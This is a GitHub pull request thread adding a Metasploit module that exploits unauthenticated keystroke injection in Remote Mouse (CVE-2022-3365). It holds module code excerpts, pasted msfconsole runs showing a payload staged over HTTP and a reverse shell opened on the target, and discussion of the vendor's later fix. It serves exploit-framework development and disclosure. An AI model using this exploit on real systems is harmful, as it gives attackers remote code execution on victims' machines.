### PR TITLE
remote mouse rce

### PR DESCRIPTION
**Pull request by h00die**
@H4rk3nz0 I tried setting a password in the Remote Mouse server UI, it had no effect on the exploit.  Seems like maybe a client side thing?  If so, this will be a CVE.  Just wanted to get your input since you tested it a while ago.

This PR adds a new exploit for the Remote Mouse software.  It's another 1 off from Unified Remote/mobile mouse and wifi mouse. 

The software allows a remote person to connect and execute screen commands via mobile device.  We use the protocol to spawn a run prompt, `certutil` down a payload and execute it.

## Verification

- [ ] install software
- [ ] Start `msfconsole`
- [ ] `use exploits/windows/misc/remote_mouse_rce`
- [ ] `set rhosts`
- [ ] `set lhost`
- [ ] `run`
- [ ] **Verify** you get a userland shell
- [ ] **Verify** if software is set with a password, module bails gracefully
- [ ] **Document** looks good

### CODE REVIEW

File: modules/exploits/windows/misc/remote_mouse_rce.rb [hunk 1]
```diff
@@ -0,0 +1,167 @@
...
+  def exploit
+    connect
+
+    print_status('Connecting')
+    print_status('Sending Windows key')
+    send_command(windows_key)
+
+    print_status('Opening command prompt')
+    send_command('cmd.exe')
+
```
Comment (H4rk3nz0) [inline modules/exploits/windows/misc/remote_mouse_rce.rb:147]: Additional: send_command('')
This resolves GUI inconsistencies with newline\return. 
Was unable to get command execution working appropriately on Win 11 without.

**Comment by H4rk3nz0** [comment]
Hi @h00die, great module. Left a comment regarding double return being sent/passed on as without it there is some inconsistency in getting code execution working (searches the web instead on Windows 11 at least). Also regarding the exploit and password functionality you're quite right the software has never enforced configured passwords in any way when replaying traffic in this manner. At least to my knowledge with the 3/4 odd versions I have now run the exploit against. 

This was detailed in the exploit-db entry so if this would be deemed necessary for CVE submission it may be worthwhile consulting with them: github.com/0rphon. The original exploit was by 0RPHON which utilized UDP and was rather infuriatingly inconsistent due to dropped or uninterpreted traffic. I wrote my version as it seemed there was some oversight in the application being able to utilize TCP for many transactions and to streamline the exploit process. Also to accommodate for changing versions in the returned application banner.

Otherwise with the changes I commented on the exploit worked successfully against my own Windows system and appears well made. Thanks!

**Comment by h00die** [comment]
@0rphon anything to add to this conversation?

**Comment by h00die** [comment]
@todb-r7 assigned CVE-2022-3365 for this. pushed in an update for @H4rk3nz0 to try on windows 11.

**Comment by 0rphon** [comment]
> @0rphon anything to add to this conversation?

Glad to see remote mouse still hasn't patched this lol nothing much to add on my side. they never enforced the password as far as I'm aware.

File: documentation/modules/exploit/windows/misc/remote_mouse_rce.md [hunk 2]
```diff
@@ -0,0 +1,114 @@
...
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/windows/misc/remote_mouse_rce`
+4. Set `rhost` and `lhost` as required.
+5. Do: `run`
+6. You should get a shell as the user who is running Remote Mouse.
+
+## Options
```
Comment (space-r7) [inline documentation/modules/exploit/windows/misc/remote_mouse_rce.md:19]: Could some details about `PATH` and `CLIENTNAME` (if used) be added here as well?

File: modules/exploits/windows/misc/remote_mouse_rce.rb [hunk 3]
```diff
@@ -0,0 +1,168 @@
...
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Remote Mouse RCE',
+        'Description' => %q{
+          This module utilizes the Remote Mouse Server by  Emote Interactive protocol
```
Comment (space-r7) [inline modules/exploits/windows/misc/remote_mouse_rce.rb:21]:
```suggestion
          This module utilizes the Remote Mouse Server by Emote Interactive protocol
```

File: modules/exploits/windows/misc/remote_mouse_rce.rb [hunk 4]
```diff
@@ -0,0 +1,168 @@
...
+        ],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'windows/shell/reverse_tcp'
+        },
+        'DisclosureDate' => '2019-04-15',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK] # typing on screen
```
Comment (space-r7) [inline modules/exploits/windows/misc/remote_mouse_rce.rb:52]:
```suggestion
          'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS] # typing on screen
```

File: modules/exploits/windows/misc/remote_mouse_rce.rb [hunk 5]
```diff
@@ -0,0 +1,168 @@
...
+        }
+      )
+    )
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'Port Remote Mouse runs on', 1978]),
+        OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),
+        OptString.new('PATH', [true, 'Where to stage payload for pull method', 'c:\\Windows\\Temp\\']),
+        OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', '']),
```
Comment (space-r7) [inline modules/exploits/windows/misc/remote_mouse_rce.rb:61]: This doesn't appear to be used in the module. Is this needed?

**Review by space-r7 — COMMENTED** [review]
Just a few minor suggestions / questions. Worked for me:

<details><summary>Output</summary>

```
msf6 > use exploit/windows/misc/remote_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/misc/remote_mouse_rce) > set rhost 192.168.140.131
rhost => 192.168.140.131
msf6 exploit(windows/misc/remote_mouse_rce) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(windows/misc/remote_mouse_rce) > set srvport 9999
srvport => 9999
msf6 exploit(windows/misc/remote_mouse_rce) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] 192.168.140.131:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.140.131:1978 - The target appears to be vulnerable. Received handshake with version: 411
[*] 192.168.140.131:1978 - Connecting
[*] 192.168.140.131:1978 - Sending Windows key
[*] 192.168.140.131:1978 - Opening command prompt
[*] 192.168.140.131:1978 - Sending stager
[*] 192.168.140.131:1978 - Using URL: http://192.168.140.1:9999/
[+] 192.168.140.131:1978 - Payload request received, sending 73802 bytes of payload for staging
[+] 192.168.140.131:1978 - Payload request received, sending 73802 bytes of payload for staging
[*] 192.168.140.131:1978 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.140.131
[*] Command shell session 1 opened (192.168.140.1:4444 -> 192.168.140.131:49995) at 2022-10-03 12:50:38 -0500
[*] 192.168.140.131:1978 - Server stopped.
[!] 192.168.140.131:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\GSgUkc9nbaBkXTj.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.19041.630]
-----
          

C:\Users\Shelby Pace>whoami
whoami
desktop-k00kiug\shelby pace

C:\Users\Shelby Pace>
```

</details>

File: modules/exploits/windows/misc/remote_mouse_rce.rb (hunk 5 above)
Comment (h00die) [reply modules/exploits/windows/misc/remote_mouse_rce.rb:61]: good catch, leftover from using another module as a template

File: documentation/modules/exploit/windows/misc/remote_mouse_rce.md (hunk 2 above)
Comment (h00die) [reply documentation/modules/exploit/windows/misc/remote_mouse_rce.md:19]: added PATH

**Comment by h00die** [comment]
addressed comments, retested, still working on my side!

**Comment by h00die** [comment]
sorry, not sure if that last comment came through correctly.  The module is still working on my side, not that i'm still working on the code

**Comment by space-r7** [comment]
Still works for me as well. Will get this landed soon. Thanks!

```
msf6 exploit(windows/misc/remote_mouse_rce) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] 192.168.140.131:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.140.131:1978 - The target appears to be vulnerable. Received handshake with version: 411
[*] 192.168.140.131:1978 - Connecting
[*] 192.168.140.131:1978 - Sending Windows key
[*] 192.168.140.131:1978 - Opening command prompt
[*] 192.168.140.131:1978 - Sending stager
[*] 192.168.140.131:1978 - Using URL: http://192.168.140.1:9999/
[+] 192.168.140.131:1978 - Payload request received, sending 73802 bytes of payload for staging
[+] 192.168.140.131:1978 - Payload request received, sending 73802 bytes of payload for staging
[*] 192.168.140.131:1978 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.140.131
[*] Command shell session 1 opened (192.168.140.1:4444 -> 192.168.140.131:62604) at 2022-10-04 11:38:10 -0500
[*] 192.168.140.131:1978 - Server stopped.
[!] 192.168.140.131:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\GLINC2rYYm.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.19041.630]
-----
          

C:\Users\Shelby Pace>whoami
whoami
desktop-k00kiug\shelby pace

C:\Users\Shelby Pace>^C
Abort session 1? [y/N]  y
```

**Comment by space-r7** [comment]
## Release Notes

This module utilizes the Remote Mouse Server by Emote Interactive protocol to deploy a payload and run it from the server, achieving unauthenticated code execution as the user running the server.

**Comment by 0rphon** [comment]
> @todb-r7 assigned CVE-2022-3365 for this. pushed in an update for @H4rk3nz0 to try on windows 11.

i see the ID has been reserved but do you have any insight on when the CVE will be made public? i figure it would be nice to have an easy reference to this exploit on my resume

**Comment by gwillcox-r7** [comment]
@h00die Just as a heads up appears this may have been fixed in latest release aka 4.502. Here is the output from my tests:

```
msf6 exploit(windows/misc/remote_mouse_rce) > exploit

[*] Started reverse TCP handler on 172.24.139.93:4444 
[*] 172.24.134.88:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 172.24.134.88:1978 - The target appears to be vulnerable. Received handshake with version: 510
[*] 172.24.134.88:1978 - Connecting
[*] 172.24.134.88:1978 - Sending Windows key
[*] 172.24.134.88:1978 - Opening command prompt
[*] 172.24.134.88:1978 - Sending stager
[*] 172.24.134.88:1978 - Using URL: http://172.24.139.93:8080/
[*] 172.24.134.88:1978 - Executing payload
[*] 172.24.134.88:1978 - Server stopped.
[!] 172.24.134.88:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\lAUjwW2tgc.exe' on the target
[*] Exploit completed, but no session was created.
msf6 exploit(windows/misc/remote_mouse_rce) > 

```

**Comment by gwillcox-r7** [comment]
Looks like they also redesigned the program so now it runs as SYSTEM using a service 🤣 Why this is needed I have no idea but hey kernel level control is always handy 👍

**Comment by h00die** [comment]
can confirm. at least it punts back a good version number string so we can fork.  @0rphon and @H4rk3nz0 any interest in seeing what the protocol difference is? I can update the module if you let me know, just working on other modules right now so no time to dissect this.

@gwillcox-r7 if no one is interested in a week, i'll update this module to die on versions >= 510 and update the docs

**Comment by H4rk3nz0** [comment]
Small notes of interest: Debugging and analyzing the Remote Mouse binary is quite trivial as it is written in C#. There is a feature described as being a FileServer within the application code . It appears intended to listen on port 1986 and open files using `"explorer.exe " + arguments` which would have been ideal for command injection. Sadly, this was facilitated by a separate mobile app called Photo Transfer which appears to have been abandoned by the developer and the file server no longer runs on startup. As for Remote Mouse itself. The traffic appears to now use some form of obfuscation/encryption for communication however I am having a hard time narrowing down exactly how this is handled though I suspect key derivation from the password MD5 hash. Can't attest to any 'security improvements' as the protocol and communications look to function entirely differently.

**Comment by h00die** [comment]
I found 4.2.0 here: https://remote-mouse.en.uptodown.com/windows/versions . I suspect that was the re-write w/ the encryption/obfuscation as the module doesn't work against it. Also the server version string went from 4xx to 5xx, so I suspect that's the 'major rewrite' version string increment as opposed to the 4.110 to 4.200 the software installs with.

**Comment by 0rphon** [comment]
> can confirm. at least it punts back a good version number string so we can fork. @0rphon and @H4rk3nz0 any interest in seeing what the protocol difference is? I can update the module if you let me know, just working on other modules right now so no time to dissect this.
> 
> @gwillcox-r7 if no one is interested in a week, i'll update this module to die on versions >= 510 and update the docs

years ago when i initially found this exploit i attempted to contact the devs and follow responsible disclosure. they never responded back to me initially but clearly saw my email because shortly after they changed the caesar cypher so the exploit i showed them didn't work anymore (i guess they considered that "fixing it"). i haven't actually looked at the update so this is a total guess, but could it be possible that they just changed the caesar cypher again?

**Comment by 0rphon** [comment]
> I found 4.2.0 here: https://remote-mouse.en.uptodown.com/windows/versions . I suspect that was the re-write w/ the encryption/obfuscation as the module doesn't work against it. Also the server version string went from 4xx to 5xx, so I suspect that's the 'major rewrite' version string increment as opposed to the 4.110 to 4.200 the software installs with.

i haven't looked at the updated version at all, but i would check to see if they changed the caesar cypher. i know years ago when i initially emailed them disclosing this exploit all they did was change the cypher and call it "fixed"

**Comment by 0rphon** [comment]
i'm pretty busy these days, but i can look into this once i get a chance. gives me an excuse to use the new fuzzing framework ive been working on lol

**Pull request merged**